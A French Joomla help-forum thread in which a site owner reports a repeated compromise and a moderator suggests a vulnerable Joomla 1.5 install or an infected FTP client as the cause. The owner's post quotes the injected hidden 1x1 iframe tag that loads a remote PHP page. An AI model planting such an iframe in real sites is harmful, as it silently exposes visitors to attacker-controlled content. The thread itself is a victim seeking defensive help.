iframe pirates

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [Problème] iframe pirates

    Bonjour,
    Je suis sous Joomla 2.5.7 hébergé chez 1and1.
    adresse du site : www.sdajce.net

    J'ai un soucis depuis quelques jours.
    Mon site met régulièrement des messages d'erreurs en haut du site disant que des données avaient été envoyées avant le session_start();
    Je regarde le code source de la page et constate que le texte "<iframe src="http://aptur.net/imgs/1.php" width="1" height="1" frameborder="0">" se retrouve en tout début de page plusieurs fois de suite.

    Je télécharge toutes les pages du site et avec un petit soft je scanne tous les fichiers à la recherche de ce texte et découvre (horrifié) que le texte est présent dans quasiment tous les php et html du site.

    Je crie au piratage/hacking puis je fais en sorte de supprimer toutes ces occurences du texte.

    Je retransferts tous sur le site, tout marche bien. Cool, j'ai réparé le bousin...

    Hier, rebelote (iframe...) avec une adresse différente dans le src, je re-télécharge, re-balance, ca marche !

    Aujourd'hui rebelote (et dix de der) avec l'adresse ci-dessus...

    Aidez-moi svp. Je dois contacter 1and1 (c'est pas gagné...) ? Une sécurité supplémentaire à mettre en place ? Changer mon mot de passe ftp ?

    J'ai le même problème sur un site en joomla 1.5.X que ma femme utilise, c'est ce site qui a eu le soucis en premier... Peut-être une infection par ce site qui s'est propagé à mon site (même hébergement, deux dossiers différents du domaine).

    A l'aide !!

  • #2
    Re : iframe pirates

    [modo]Sujet déplacé en sécurité[/modo]

    L'infection par un site en J!1.5 est toujours possible, il est probable qu'une faille 1.5 ait été utilisée.

    Mais il est également possible que ce soit le logiciel FTP (Filezilla) qui soit infecté et serve de vecteur.
    Pas de demande de support par MP.
    S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

    Commentaire


    • #3
      Re : iframe pirates

      Merci pour les infos et pour le déplacement du sujet dans la section idoine.
      Quitte à n'avoir pas vraiment de solution durable, y a-t-il un moyen de faire cette suppression de texte autrement qu'en copiant/modifiant/collant tout le site sur mon pc via ftp ?

      Commentaire


      • #4
        Re : iframe pirates

        La vraie solution consiste à tracer l'origine de l'injection et à l'éradiquer.
        Pas de demande de support par MP.
        S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

        Commentaire


        • #5
          Re : iframe pirates

          Comment puis-je faire ca ?

          Commentaire


          • #6
            Re : iframe pirates

            Envoyé par Shivan0910 Voir le message
            Comment puis-je faire ca ?
            En commençant par investiguer le site en 1.5 (est-il à jour ? Aucune extension vulnérable ?)
            Et également en vérifiant si ton logiciel FTP n'est pas infecté.
            Pas de demande de support par MP.
            S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

            Commentaire

            Annonce

            Réduire
            Aucune annonce pour le moment.

            Partenaire de l'association

            Réduire

            Hébergeur Web PlanetHoster
            Travaille ...
            X